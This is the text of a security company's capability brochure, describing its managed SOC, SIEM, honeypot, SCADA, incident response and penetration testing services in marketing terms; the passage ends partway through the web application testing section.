1. Security | Engineering | Technology
INFORMATION SECURITY
MANAGED SECURITY SERVICES
PROFESSIONAL SECURITY SERVICES
COMPLIANCE CONSULTING
2. CONTENTS
Solutions & Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Managed Security Services . . . . . . . . . . . . . . . . . . . . . . . . . 2
Managed Firewall & Managed SIEM . . . . . . . . . . . . . . . . . 4
SOC-in-a-Box . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
Assisted SOC Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Customer dashboards . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
White Labeled Managed Services . . . . . . . . . . . . . . . . . . 12
Advanced Threat Protection and Malware Detection . 14
Managed Honeypot Active Defense . . . . . . . . . . . . . . . 16
Managed SCADA Security . . . . . . . . . . . . . . . . . . . . . . . . 17
Continuous Threat Defense Service
Machine Learnt Behavioural Anomalytics . . . . . . . . . . . 18
Benefits of Engaging an MSS Provider . . . . . . . . . . . . . . 20
Si CSIRT Teams . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Professional Security Services . . . . . . . . . . . . . . . . . . . . . 24
Vulnerability Assessments . . . . . . . . . . . . . . . . . . . . . . . . 26
Penetration Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
Web Application Security Testing . . . . . . . . . . . . . . . . . . 28
Network Risk Assessments . . . . . . . . . . . . . . . . . . . . . . . . 29
Firewall Migration Services . . . . . . . . . . . . . . . . . . . . . . . . 30
Network Architecture Review . . . . . . . . . . . . . . . . . . . . . 31
BYOD . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
Compliance Consulting . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
ISMS - ISO 27001 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
BCP & Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
PCI Compliance & PCIS . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
Compliance & Security Skills Training . . . . . . . . . . . . . . . 39
Contact Us . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
OBJECTIVE
Born out of a common vision... “we deliver to our clients the very best security services by using innovation,
professionalism and our depth of expertise.“
We deliver on our promise to enhance our clients’ information security posture, lower their total cost of ownership and
demonstrate compliance through our managed security and professional services, day in, day out 24 x 7.
Managed Services
• Managed IDS & IPS
• Firewall management
• Managed application firewall
• Log monitoring
• Log retention
• SIEM as a service
• CSIRT (Computer Security Incident Response)
Professional Services
• Vulnerability management & testing
• Penetration testing
• Web application security
• Network risk assessment
• Device configuration & mitigation reviews
• Cyber forensics
• BYOD
Compliance
• PCI consulting
• PCI scanning
• ISO 27001
• Polices & procedures
• ITIL readiness & training
• Business continuity planning
About Us
Si is driven by a desire to offer our clients the highest degree of protection against todays cyber threats. We do this by delivering
the most customizable approach to security managed services available and by providing a highly tailored and responsive
approach for each client. We protect all IT assets including virtual assets, cloud and traditional infrastructure using our team of
over 150 dedicated security experts from our Security Operations Centres in London, New York, Dubai and Mumbai.
Established in 2003 with over a decade in Security and Cyber Security consulting and management services, our objective is
to place the power of our SOC team into our clients’ hands to provide complete visibility of security events and threats within
their environments. Our aim is to become an extension of our clients’ internal teams as a trusted partner.
Why Us?
• Dedicated security specialist
• Global SOC’s across 4 continents
• Powered by industry best technology
• Powered by industry experts and analysts
Solutions & Services
Si provides Managed Security and Professional Security Consulting services to thousands of end customers. Our delivery
model utilizes a cloud based information security and compliance solution, which requires no capital expenditure from our
clients and is accessible via a secure and innovative customer platform.
3. “Establish a monitoring strategy and develop supporting policies,
taking into account previous security incidents and attacks, and
your organisation’s incident management policies. Continuously
monitor inbound and outbound network traffic to identify unusual
activity or trends that could indicate attacks and the compromise
of data”
Extract from the “10 Steps to Cyber Security”, CESG information security arm of GCHQ
We provide the following Managed Security Services:
• Design of security operations centres (SOCs)
• Onsite operation of our clients’ SOCs
• White labeled MSSP solutions
• A cloud based managed firewall + SIEM service
• On demand Security Incident Response Teams (SIRT)
Si enhances the operational efficiency of our clients’ information systems with our Managed Security Services. By optimizing
IT asset utilization, risk management and compliance we improve uptime and availability.
We design, build and operate security operation centres either onsite at our customers’ locations or in the cloud through our
network of security operation centres.
We have built and we operate security operation centres across London, New York, Dubai and Mumbai. This gives us a
proactive 360o
view of global threats.
We are dedicated to serving a range of customers across
verticals such as financial services, telecoms, retail and
healthcare with 80% of our global clients comprising
blue-chip Fortune 500 and Government organisations.
Services Description
Managed Firewall
24x7 monitoring and managing of customers security devices
(FW, IPS, UTM, WAF and more)
Managed SIEM
24x7 monitoring of customer assets and event correlation
(network, servers, apps, databases, FW, IPS)
Advanced Threat Protection and Malware Detection
Supply management of advance next generation FW’s, IPS’s and malware
detection probes with advanced correlation
Managed SCADA Security Supply and management of SCADA firewalls for critical infra, oil gas
Advanced Threat Management Supply and correlation of commercial threat feeds (e.g Norse).
Managed Vulnerability Management Vulnerability Management
Honeypot Active Defense
Active defense utilising honeypot infrastructure correlated with SIEM for
proactive management
Managed Web Application Firewall
Supply management of web application firewalls utilising Citrix Netscaler
for defense of web environments
Continuous Threat Defense
Advanced behaviour analysis using cyberflow anormalytics to detect
malicious activity
SOC-in-a-Box + 24X7 Monitoring
Supply management of SOC infrastructure onto a customer site including
the 24 x 7 monitoring of all event sources
SOC Staffing Outsource - Onsite
Onsite provision of staffing to monitor, administer and manage customer
deployed and owned SOC infrastructure and event sources
SOC Staffing Outsource - Offsite
Offsite provision of staffing to monitor customer deployed and owned SOC
infrastructure and event sources
4. INFORMATION SECURITY | CAPABILITY STATEMENT | 5
Managed Firewall Managed SIEM
Managing and monitoring security devices is a highly skilled operation that can be a time consuming and resource intensive
process. Our managed security services allow our clients to focus on their core business while we concentrate on providing
secured networks and systems.
The service we offer is 24x7 and is scalable, compliant and cost effective. This service is designed for banking, government and
enterprise clients that wish to outsource SIEM services against strict SLA’s and compliance requirements.
With over 20,000 devices under management, our cloud based service is secured across our redundant global SOCs and offers
a resilient and dependable service.
Summary Features
Managed Firewall Managed SIEM
24 X 7 Security Monitoring In Country Log Retention Real Time Incident Response
Advanced Event Correlation
Event Storage For
Forensic Analysis
ISO 270001, SANS 20
Compliance Reports
15 Minute SLA Response
Time
SIEM Powered
By LogRhythm
Web Based Customer
Dashboards
Policy Signature
Configuration Changes
Weekly Reports
Performance, Availability
Threat Management
What do we manage?
Servers System OS,
Applications Databases
Core Network Equipment Network Security Equipment
Security Managed Servers (Windows,
Linux, Unix, ESX)
Network Routers / Switches Managed Firewalls
Applications Network Wireless LAN Managed Network IDS or IPS
Databases Network Load-Balancers / Accelerators Managed Network VPN Routers
Email Servers Managed Network AntiSpam / Proxys
Managed UTMs
Firewall / IDS / IPS / Network Devices / Server
Security Services Feature Set Monitor Manage
Threat Management
24x7 Proactive Security Incident Monitoring,
Detection Notification
SIEM Correlation
Security Policy Consultation
Incident Management
Configuration Management
Maintain Device Inventory Database
Backup of Device Configuration
Fault Management
Availability Monitoring
Fault Detection Notification
Fault Diagnosis Resolution
Vendor Management
Change Management
Maintain Documentation
Policy Signature Configuration Changes
OS Updates, Patches Signatures
Maintain CMDB
Operating System Upgrades
Reporting
Basic Reporting
Advanced Reporting
Web Portal
Web Based Portal
Access to Threat Feeds
Log Retention
120 days online log retention
12 months archival (Customisable)
VPN SECURE
Customer Network
Managed firewall /
UTM / IDS
Managed server
Business application monitoring
Managed switch / router
Global Security Operations Center.
VPN SECURE
SOC
Co-location center
TIER 3 D.C
All logs stay in country
5. INFORMATION SECURITY | CAPABILITY STATEMENT | 7SOC-in-a-Box
SOC-in-a-Box
Si recognises that many clients have a business demand to locate our Security Operations Centre on their premises
/ data centres. We offer a rapid deployment solution to enable our clients to become operational in a matter of
days including people, processes and technology components. At the heart of the SOC lies an industry leading SIEM
(LogRhythm Security Analytics Platform) that is closely coupled with additional modules which may be added at the
customer request to include full SOC functionality.
Technology Elements
Our SOC-in-a-Box deployment represents an agnostic approach to the component architecture and provides the choice
of vendor to our customers from the following matrix.
People (Staffing) Elements
The heart of an effective SOC operation is the quality of staffing together with
robust and tested SOC policies and processes. In all cases, a 24x7 SOC operation
is required to ensure a continuous level of monitoring and defence and whilst
this can be cost prohibitive for many organisations we offer three options to
achieve this objective.
Options: Staffing
Option 1: Remote 24x7 monitoring from our Global Security Operations Centre.
Option 2: Onsite 24x7 monitoring at our customer’s site location
Option 3: Hybrid – Onsite (8x5) team, offsite (evening shift, weekends and public holidays)
In all cases we ensure that all security logs stay onsite at the customers SOC
infrastructure.
SOC Component Technology
Core Component: LogRhythm Security Analytics Platform
Module 1: Incident Response Workflow Handling Request Tracker
Module 2: Vulnerability Management Rapid7, Nessus or Qualys
Module 3: Advanced Threat Defence
Palo Alto, Cisco Sorcefire or ThreatTrack
Module 4: Advanced Threat Intelligence Norse
Module 5: Honey Pot Active defence Honeypot Infrastructure - HoneyDrive
Module 6: Web Application Defence LogRhythm Web Application Defense Suite + Third party WAF (Optional)
Module 7: Continuous Threat Defence CyberFlow Anormalytics Suite - Anomaly Detection system
SOC and Incident Response Processes
Si’s team has been designing, operating and consulting on SOC deployments globally for over 10 years and a particular
strength is our ability to develop and optimise SOC and Incident Response processes. Whilst this element is often overlooked
we believe this is the single most important ingredient to consistent successes and predictable results. Our clients will benefit
from this experience when they partner with Si to deliver our SOC-in-a-Box offering.
Service Delivery Architecture
Step 1
Select Technology
OPtion 1:
LogRhythm Onsite – Buy
24x7 Outsource
Onsite Team
Si Soc Processes
Customer Soc Processes
24x7 Remote Monitoring
Offsite Team
24x7 Hybrid Team
Day shift - Onsite Team
Night Shift - Remote Offsite
OPtion 2:
LogRhythm Onsite – Lease
OPtion 3:
Soc in a box
Step 2
Select Staffing
Step 3
Select Processes
6. INFORMATION SECURITY | CAPABILITY STATEMENT | 9
Assisted SOC Services
Empowered SIEM
Technology itself is not enough; an efficient SOC team requires a critical balance of people, process and technology. Si
partners with LogRhythm to empower our customers to leverage their existing SIEM investments by providing a 24 x 7
Monitoring service offering.
The Operational Challenge
SOC ops require highly skilled security
professionals to investigate security
incidents, perform incident response and
forensics and help keep an organization
afloat amid a data breach.
An enterprise looking to operate a SOC needs
to evaluate whether it has the expertise
in-house to deliver effective monitoring. The
option is to transfer the risk to a specialist
SOC operator and we provide services to
support these challenges.
ASSISTED SOC SERVICES
Key Questions
Does outsourcing make sense?
It does when expertise is not available in-house, or when budget
does not allow for investment needed to employ, house, and train a
24 x 7 SOC team.
Can building a self-contained, well-staffed SOC become cost-
prohibitive for many?
The answer is yes primarily due to the resource cost of providing a
24x7 team, after all cyber never sleeps! However if budget does not
allow for an onsite team then a remote service to deliver log analysis
and event monitoring can be an economical option.
Service Level Assurance
All services are backed by an SLA:
Incidents - 15 minute response
Availability - 99.999 Uptime
Change Management - 4 hr MTTR
Security Services Feature Set Monitor
Threat Management
24x7 Proactive Security Incident Monitoring, Detection Notification
SIEM Event Management Correlation
Security Policy Consultation
Configuration Management
Maintain Device Inventory Database
Backup of Device Configuration
Fault Management
Availability Monitoring
Fault Detection Notification
Change Management Maintain Documentation
Reporting Reporting
Web Portal
Web Based Portal
Access to Threat Feeds
Log Retention Log Management and Archival
SLA
15 Minute Response Time
Service Credit Backing
Dedicated Account Manager Dedicated technical account manager
Benefits – Cost Performance
The adoption of “Assisted SOC” is motivated by three key messages: “Less Cost”, “Increased Performance” and “Service
Assurance (SLA)”. We demonstrate to our customers that we deliver SOC monitoring services better and for less than the cost
of an in-house service.
Sample Use Case – Customer X
A customer requires a 24x7 monitoring service to support their LogRhythm Security Intelligence platform with an average
MPS throughput of 1,000 MPS.
Cost Assumptions
The following cost assumptions are used for the cost benefit assessment.
Options
We recognize that not all businesses are the same and so we support the following deployment models:
• Onsite SOC Teams
• Offsite Remote SOC Team (Remote Monitoring)
• Hybrid – Day Shift Onsite / Nightshift Offsite
SOC Operator (L1)
Salary ($50,000/yr): $4,166 / mth
Overhead (20% Salary): $818 / mth
Desk Space $921 / mth
Others $767 / mth
Total Cost to Employ $6,672 / mth
Note that a 24x7 operation requires a 5 shift model and a
minimum of 5 dedicated SOC operators.
What is Included? Cost /mth of 24X7
monitoring team
Performance
+ Skills level
SLA Response
Customer X:
In house team 5 X $6,672 = $33,360 Difficult to achieve with
in house team
?
Difficult to track and
manage
Result:
Expensive, no service
guarantee + performance
risk + staff risks
Si remote
outsource team $7,000
Si dedicated security
professionals
15 minute response
Result:
Less cost + better service
assurance
7. INFORMATION SECURITY | CAPABILITY STATEMENT | 11
customer dashboards
Si’s customer dashboards offer end-to-end support to the operations of SOCs and Managed Security Service Providers (MSSP).
It has unique features to help Service Providers setup their operations in minimum time.
Unified Interface for Operations
Si provides a unified interface for the monitoring
management of one or more networks for multiple aspects.
The portal is able to collate analyse customer logs data
and integrates security intelligence tapped from global
sources with analytical tools.
Customer specific information:
• Customer account information
• Security incidents events
• Availability of critical hosts and services
• Performance of vital systems and network interfaces
• Vulnerabilities on critical systems and applications
• Incident change management
High Scalability Technology Agnostic
Si’s customer dashboards are highly scalable and can
integrate with almost any Java, ASP or Web based
application:
• Technology agnostic interface to normalized
information
• Improved operational efficiency through ease of
analysis automation
• Enhanced Web 2.0 features for user collaboration
• Flexibility to integrate with other security network
products and appliances
Vulnerability Posture Dashboard
A high level view of the security posture across an enterprise based on scans performed on
the infrastructure, patch level, miss configurations and categorisation of vulnerability.
Service Management
Management and tracking of performance against service level agreements.
Knowledge Base
Database of over 100,000 vulnerabilities and 15,000 signatures, with in-built correlation
engine to assist incident management and forensics.
Security News Feeds
Current security trends and news feeds validated in real-time through various sources and
security advisory organizations.
Security Incident Management
Complete tracking of incident handling through a triage of identification, prioritization
and remediation.
Customizable Dashboard
The customizable dashboard presents an overview of security incidents across the
enterprise. Key statistics of infrastructure areas that either require more attention or events
that provide a larger picture.
Service Centre
Service centre for opening, tracking and drill downs from incident details to resolution.
Single portal for change management.
Security Threat Analysis
The Dashboard provides a high level summary of how incidents are categorized based on
their severity and the location that needs more attention.
customer dashboards
Non-customer specific information:
• Integrated analytical tools for forensic analysis
• Access to reliable security intelligence
• Geographical information
8. INFORMATION SECURITY | CAPABILITY STATEMENT | 13
White Labeled Managed Services
We provide a service that allows our Partners to re-sell our managed security services as a white labled service. Our process
technology allow our Partners to deliver ‘in the cloud’ IT services, with no capital investment, to provide a world class, 24x7
managed security service. Si takes care of the technology and the expertise using our global operations centres allowing our
partners to take care of their customers’ security needs.
Customised with our end
customer’s logo
Customer Platform
Our partners benefit from our innovative Customer Platform that enables complete account management for reporting,
ticketing, fault management, threat vulnerability management, customized dashboards, news and knowledge base.
Our web user interface sets the benchmark globally for customer interfacing and allows both partners end customers a live
360o
view of their assets, service fulfilment and SLA performance.
News, dashboards knowledge base
Reliant proactive analytics reports
Complete SLA management
incident workflows
Customised with our
partner’s logos and colours
Drag and drop dashboard builderEasily customisable dashboards...
Customisable dashboards
Global Security Operation Centres
Easy change request
workflows
Customised Platform
Our clients’ end customers benefit from our unique multi-
service delivery platform that can customize the services
they like to offer, define the look and feel and set up their
SLA support and escalation procedures.
Our MSSP partners are traditionally telecoms operators
and security hardware vendors who seek to offer managed
services to their existing client base.
MSSP Services
We can facilitate our partners to provide their end
customers with:
• Managed firewall
• Managed UTM and IDS
• Managed switch and router
• Application management
• Vulnerability management
• Threat management
• Fault management
One click management reports
White Labeled Managed Services
9. INFORMATION SECURITY | CAPABILITY STATEMENT | 15
Advanced Threat Protection and Malware Detection
Si defends our customer networks against threats by using a market leading Next Generation Intrusion Prevention
System and deep integration into our SIEM platform (Powered by LogRhythm) to provide multi-dimensional behavioural
analytics, extended visibility and continuous monitoring for real-time threat detection response.
The Next Generation Firewalls which we support or supply include:
• Palo Alto
• Cisco Sourcefire
• ThreatTrack
• Fortinet
Summary Features
The feature set summary is provided as follows:
• 24 x 7 monitoring management
• Real time incident response system
• Advanced malware protection next generation IPS
• Packet level forensics and sandboxing
• Network behaviour analysis
• Integration with our next Gen SIEM for behavioural analytics
• Behavioural whitelisting
• Statistical baselining
• Real-time threat management
• Continuous Compliance
• Host network forensics
• Real-time contextual awareness
Use case
LogRhythm incorporates Next Gen FW security and advanced malware protection via the secure eStreamer API
and correlates it against other security device and machine logs to deliver multi-dimensional behavioural analytics,
extended visibility and continuous monitoring for real-time threat detection response.
The integration provides:
• Deeper visibility and contextual awareness into network events with advanced correlation to deliver enterprise-wide
threat detection
• Threat intelligence to help detect advanced malware attacks and realize the extent of the outbreak for fast
remediation
• Automated action against advanced persistent threats (APT) and zero-day attacks
• Unparalleled expertise through Si SOC Team, LogRhythm LabsTM and Sourcefire’s Vulnerability Research Team (VRT)
Service benefits:
• No Capex investment required
• Detect advanced malware and realize outbreak
extents for fast remediation
• Automated and immediate action against
threats such as APT and zero-day attacks
• Multi-dimensional behavioural analytics
• 24 x 7 monitoring + real time event
contextualization
Service Architecture
Si partners with leading Next Generation Firewall vendors (Palo Alto, Sourcefire or ThreatTrack) to incorporate their
advanced threat detection technology and sandboxing with our SIEM platform (Powered by LogRhythm) and correlates
it against other security devices and machine data throughout the IT environment.
Advanced Threat Protection and Malware Detection
10. INFORMATION SECURITY | CAPABILITY STATEMENT | 17
Managed Honeypot Active Defense
A honeypot is a security resource deliberately designed to be probed, attacked and compromised, for the purpose of gathering
intelligence around an attacker. By using honeypots to create better context around threats, we are able to provide a more
proactive defence posture. Our automated and integrated approach to honeypots eliminates the need for the manual review
and maintenance associated with traditional honeypot deployments.
Managed SCADA Security
Today, remotely deployed field devices and SCADA systems are increasingly brought into the IT environment and communicate
over IP. This convergence of Operational Technology (OT) and Information Technology (IT) has opened up new points of attack
or “threat vectors” for hackers.
Si has countered this threat by providing SCADA firewall technology which is integrated into our SIEM (Powered by
LogRhythm) for 24x7 monitoring, threat and incident detection.
The service is delivered using Palo Alto Networks SCADA Firewall, which is one of the only Layer 7 firewalls available for
SCADA-based environments.
Service Features
• Secure critical infrastructure, power grids, oil/gas pipelines, industrial plant
• Supports - DNP3, Modbus/TCP, Ethernet IP, IEC 61850, PROFINET and BACnet
• Layer 7 application protection and analysis for Industrial Control systems language and traffic
• Strong policy enforcement for more granular control over industrial data inputs
• Uniform secure access from control networks to sensors
• Translation of SCADA data formats into IP protocols
• SIEM integration and robust event logging
• All security logs remain in country
• Real time incident response system
• Real time events from the Firewall
• Store the events for forensic analysis
• Customisable event correlation
How It Works
Si deploys honeypot infrastructure into customer
DMZ environments to analyse malicious events
by continuously monitoring honeypot event
activity utilising our SIEM platform (Powered by
LogRhythm).
We perform real-time, advanced analytics on
all activity captured in the honeypot, including
successful logins, observed successful attacks and
attempted/successful malware activity on the host
and use this data to create a defensive posture.
Deploy Honeypot
specific to customer
requirement
SIEM (Powered by
LogRhtythm) tracks the
attacker’s actions
Analyse the honeypot
data to create profiles
of behavioural patterns
and attack methods
Apply defensive
posture for detected
profiles and signatures
The Honeypot Security Analytics Suite
delivers:
• Continuous monitoring of honeypot data
• Customized threat research for
strategic defence
• Automated breach prevention and response
• Dynamic security intelligence
• Real time monitoring
• Low cost approach for customer
specific signatures
• Fault management
Service benefits:
• Secure critical infrastructure, power grids, oil/
gas pipelines, industrial plant
• No Capex investment required
• 24 x 7 Monitoring
• Secure SCADA Networks
• Minimise business risk of security breaches
• Achieve compliance requirements
• Strict SLA response
The customer will interface with the MSSP SOC team via the customer portal where he will have customer access to:
• SLA Tracking
• Ticketing troubleshooting
• Threat Management Dashboards
• Knowledge Based for Incident Response and analytics
Managed Honeypot Active Defense | Managed SCADA Security
11. INFORMATION SECURITY | CAPABILITY STATEMENT | 19
Continuous Threat Defense Service
Machine Learnt Behavioural Anomalytics
Si partners with Cyberflow AnalyticsTM to provide a service that detects operational anomalies within packet communication
behaviour to determine high risk activities and threats. The system is the only system that can provide “Anomalytics”, a
real-time, streaming, machine-learning, behavioural analytics solution, which can instantly detect and alert operational and
security practitioners of anomalous and suspicious activities within their organizations.
This system and service uses Anomalytics to provide real-time cyber-security threat detection at scale and in situations where
traditional security products are failing to adequately identify and detect advanced polymorphic attacks and other anomalous
lateral behaviour within their organizations.
How it Works
• Collects raw packet meta data
• Machine learns normal packet communication
behaviour of clients, servers, protocols and
visualizes anomalous high risk threats
• Finds operational anomalies such as SNMP
event storms, odd port/app activity and changes
in IoT sensor communications
• Automation of clustered breach activity tracks
Advanced Persistent Threats (APTs)
• Uses a SPAN port configuration to collect data
• Operates within VMs on any customer
virtualized infrastructure (lightweight data
footprint)
Service Benefits:
• It is able to monitor traffic effectively over
the entire network, as opposed to traditional
security products which monitor only
segments of a network
• The service can detect APTs which other
analytics methods cannot capture
• Cost effective and scalable
• Real time monitoring
• Integrated with SIEM
1. Deploy a virtual
machine network, app
and device sensors that
monitor systems to
feed the “Anomalytics
Fusion Engine”.
2. Execute multiple,
real-time analytical
models to construct
self-organizing maps
which present high risk
behaviour.
3. Cross-correlate
the maps against a
behavioural policy
framework.
4. We correlate the
real-time anomaly
threat detection and
alerts through our
SIEM to drive rapid
incident response and
forensics.
Service Architecture
Dashboards
The following image represents a dashboard identifying the high risk traffic occurring within the network utilising
port level analytics.
“Anomalytics Fusion Engine”
Continuous Threat Defense Service | Machine Learnt Behavioural Anomalytics
12. INFORMATION SECURITY | CAPABILITY STATEMENT | 21
Benefits of Engaging an MSS Provider
Cost
“The cost of a managed security service is typically less
than hiring in-house, full-time security experts.”
(Wilbanks, 2001).
Staffing
“A shortage of qualified information security personnel
puts tremendous pressure on IT departments to recruit,
train, compensate, and retain critical staff.” (Hulme, 2001)
An MSSP transfers this responsibility. In addition, “if a
client organization can outsource repetitive security
monitoring and protection functions, then they can focus
internal resources on more critical business initiatives”
(Pescatore 2001).
Skills
“MSSPs have insight into security situations based on
extensive experience, dealing with hundreds or thousands
of potentially threatening situations every day, and are
some of the most aggressive and strenuous users of
security software.” (Navarro 2001 DeJesus 2001)
“In-house staff members who only deal with security on a
part-time basis may only see a limited number of security
incidents.” (Hulme, 2001)
Facilities
“MSSPs can also enhance security simply because of the
facilities they offer.” (DeJesus, 2001). These are physically
hardened sites with state-of-the-art infrastructure
managed by trained personnel.
Objectivity and Independence
An MSSP can provide an independent and objective
perspective on the security posture of an organization. An
in-house team often can not be objective and certainly is
not independent.
Security Awareness
“It is difficult for an in-house team to track and address
all potential threats and vulnerabilities as well as attack
patterns, intruder tools, and best security practices.” (Alner
2001, Navarro 2001)
Whereas ….
An MSSP is often able to obtain advance warning of new
vulnerabilities and gain early access to information on
countermeasures.
Service Performance
The MSSP service can report near real-time results,
24 hours a day, 7 days a week, and 365 days a year,
guaranteed against an SLA. This is a large contrast with
an in-house service that may only operate during normal
business hours.
Service Security and Technology
“Service security solutions and technologies such as
firewalls, intrusion detection systems (IDSs), virtual private
networks (VPNs) and vulnerability assessment tools are far
more effective because they are managed and monitored
by skilled security professionals.” (Wilbanks, 2001)
Benefits of Engaging an MSS Provider
Cost
Staffing
Skills
Facilities
Independence
Security
Awareness
Service
27%
Recurring
Annual Save
200+
Dedicated
Security
Professionals
360O View
Of Global
Threats
We Are
Built For Big
Data
20%
Technology
But 80%
Interpretation
94%
Initial Cost
Savings
SLA
15 Minute
Alert-High
Priority events
MSSP
Benefits
The Business Case for
Managed Security Services
13. INFORMATION SECURITY | CAPABILITY STATEMENT | 23
98 99 00 01 02 03 04 05 06 07 08 09 10 11 12 13
Crccommsover
standardIRCportctccommsovernon
standardIRCportsCrccommsover
HTPHTTPS
ctcusingSocial
Media,TwitterFBCrccommsover
p2p-usinsautoDDOS0-Daythreats
nowcommonplace
FastfluxDNS
nowwidespreadNewwaveofDLL
Hijack
Firstmajorcyber
warfareattack
Mydoom Sasser
Record for
Most damage!
The rise in nation
state Malware!
Flame - the most
sophisticated
Malware yet!
MalwareSophistication
CSIRT skills experience
Si follows the best industry standards and guidelines for
incident response.
The increasing sophistication and impact of malware
attacks emphasises the need for companies to retain the
services of a professional CSIRT team.
Our CSIRT engineers are highly experienced and maintain a
tool kit of skills including:
• Vulnerability management
• Penetration testing
• Botnets
• Sandbox
• Honeypot
• Forensic analysis
Why hire a professional CSIRT?
The inability of companies to prepare for possible cyber-attacks from incredibly resourceful criminals is one of the most
pressing issues facing global chief executives. The increasing sophistication of attacks, which render even the most technology
savvy organizations vulnerable, mean that few organizations have the means to employ staff with the ability to respond
effectively. We offer an incident response service that allows our customers’ organizations to benefit from our skills and
experience.
Malware Sophistication Vs Time
Rapid Response CSIRT Services
Incident Response
Reverse Engineering/Analysis
Advanced Threat Alerting
Forensics
Malware Analysis
Assessments Audits
Script Development
Remediation and Recovery
si csirt teams
Si has been running a Computer Security Incident Response Team (CSIRT) for many years. Through the development of our
own SOC and our clients’ SOCs our staff are some of the most qualified and experienced incident response engineers in the
market place.
Si CSIRT LAB
Through the development of our own SOC, our CSIRT lab
comprises an extensive library of incident case files that
are key for supporting analysis and mitigation measures.
The very fact that Si has SOCs around the world, gives our
CSIRT teams a unique insight into a wide range of threats
and risks, enabling us to react faster to such incidents. Each
member of the team has access not only to the labs, but to
this global resource.
CSIRT Services
We offer our professional services to enterprise, telecom
and government organisations on a cost effective basis.
The available options for procuring these services include:
• Staff secondment
• Retainer leased rapid response teams
• Remote CSIRT teams
The security incident management team
activities include:
SI CSIRT TEAMS
Email Information
Request
Vulnerability
Report
Hotline/Helpdesk
Call Center
Figure 5: CERT/CC Incident Handling Life Cycle
Triage
Incident
Report
Analyze
ResolutionObtain Contact
Information
Coordinate
information
Response
Provide Technical
Assistance
Other
IDS
CSIRT Incident Handling Life Cycle
14. “Eighty percent of the intrusions of your networks today can be
handled by patches, anti-virus and user actions. We spend 90
percent of our time on the 80 percent of the issues that could be
handled by good hygiene.”
Brigadier General Paul Nakasone, Deputy Commander, U.S. Army Cyber Command
Si’s Professional Security Services provides enterprise-wide assessments, design and deployment services to build secure and
resilient IT infrastructures.
Our delivery model is based on industry best practices and technologies that are aligned to our clients’ IT infrastructure and
business processes. Our services create a foundation that enables our clients to address key risk management and compliance
challenges.
Vulnerability Assessments
Penetration Testing
Web Application
Security Testing
Network Risk
Assessments
Network Architecture
Reviews
Device Configuration And
Migration Reviews
Cyber Forensics
According to Davos World Economic Forum, 2013, (the
Global Agenda Survey), “Cyber Risks” were ranked as the
3rd largest underestimated risk to world development
ahead of sovereign debt, education and protectionism.
15. INFORMATION SECURITY | CAPABILITY STATEMENT | 27
INFORMATION
GATHERING
Active Passive
Reconnaissance
TARGET
DISCOVERY
Finalizing
The Scope
SCANNING
FINGER PRINTING
Identifying
Underlying
Technology
Service
LOCAL
SEGREGATION
OF TARGETS
Grouping
Targets Based on
Attack Vectors
APPLICATIONS
Web Servers,
Database Servers,
Mail Servers,
SSH, FTP
OPERATING
SYSTEMS
Windows, Linux,
Unix Solaris
WEB BASED
APPLICATIONS
E-Commerce,
B2B, Custom
Websites
Appliances
PERIMETER
DEVICES
Network
Security
Appliances
VULNERABILITY
IDENTIFICATION
Locating Known
Unknown
Vulnerabilities
VULNERABILITY
ANALYSIS
Filtering
Confirming
Attack Methods
PENETRATION
EXPLOITATION
Confirming
of Existing
Vulnerabilities
IMPACT
ANALYSIS
Extent of
Business impact
due to Vulnerability
Exploitation
REPORTS
Detailed
Findings,
Management
Report Executive
Summary
DATA
CORRELATION
MITIGATION
STRATEGIES
A robust policy template to enable security
configuration compliance
Compliance-based reports
(PCI, HIPPA, GLBA, FISMA and SOX)
Customisable, multi-view reports that make the most
of existing security investments
Audit-read reporting and certified technical support teams
Internal and external vulnerability scans
Best practices (ITIL, OSSTMM and ISO 27001 security standard)
Instant access to Secure-I security intelligence and research
Executive summaries (jargon-free, true executive-level summaries)
Priority matrixes, indicating remediation priorities and risks
Detailed impact analysis of the identified vulnerabilities
Findings and recommendations to improve security postures
Knowledge transfer to client’s IT teams
Vulnerability Assessments
Si’s Vulnerability Assessment (VA) service provides our clients with the ability to identify and mitigate security gaps associated
with their IT assets, thereby enhancing their overall security posture.
Our assessments meet the mandatory compliance requirements and provide a proactive measure to stay one step ahead of
threats.
Penetration Testing
Interconnected corporate networks of partners, clients, remote offices, wireless LANs, vendors and the Internet have created
multiple avenues for an attacker to target companies. Organisations face greater risks to customer data, intellectual property
and financial records.
CIOs and CFOs must have a clear understanding of risks and vulnerabilities to protect their organizations from external
attacks.
Our Vulnerability Assessment provides:
• On-demand proactive vulnerability management for
organisations
• Visibility, awareness and consistency of our clients’
organisations
• Tracks asset ownership, pinpoints rogue devices and
views detailed asset discovery and profile reporting
• Reduces investment in tools and technology
• Comprehensive remediation solutions
• Complete remediation procedures to mitigate
identified vulnerabilities
Our Penetration Testing services enable our
clients to:
• Identify existing and potential vulnerabilities and
risks from external attacks
• Utilise experienced security analysts with the
specialized skills and tools needed to mitigate client
risk
• Conduct testing in a safe and controlled environment
without compromising routine business activities
• Reduce investment associated with employing full
time security analysts, tools and technologies
• Integrate with an overall risk management solution
to address the audit requirements of policy and
compliance frameworks such as ISO 27001, SOX,
HIPPA, PCI etc
Features include:
Features include:
VULNERABILITY ASSESSMENTS | PENETRATION TESTING
16. INFORMATION SECURITY | CAPABILITY STATEMENT | 29
Comprehensive documentation and
presentation of findings
A prioritised list of remediation steps
Practical recommendations focusing on both the risk
and cost associated with it
Action plan – short and long term to achieve
compliance and business objectives
Identification of technical and logical vulnerabilities
such as SQL injection, cross-site scripting, I/O data
validation, exception management etc.
Ability to determine remediation steps
and counter-measures
Detailed technical information report covering the
nature of the defect, the code locations, impact of
defect and the remediation solutions
Web Application Security Testing
IT applications allow our clients to directly access personal and confidential information, encouraging a self-driven model and
decreasing costs.
Critical business functions are dependent on the successful functioning of IT applications. There is an exponential increase in
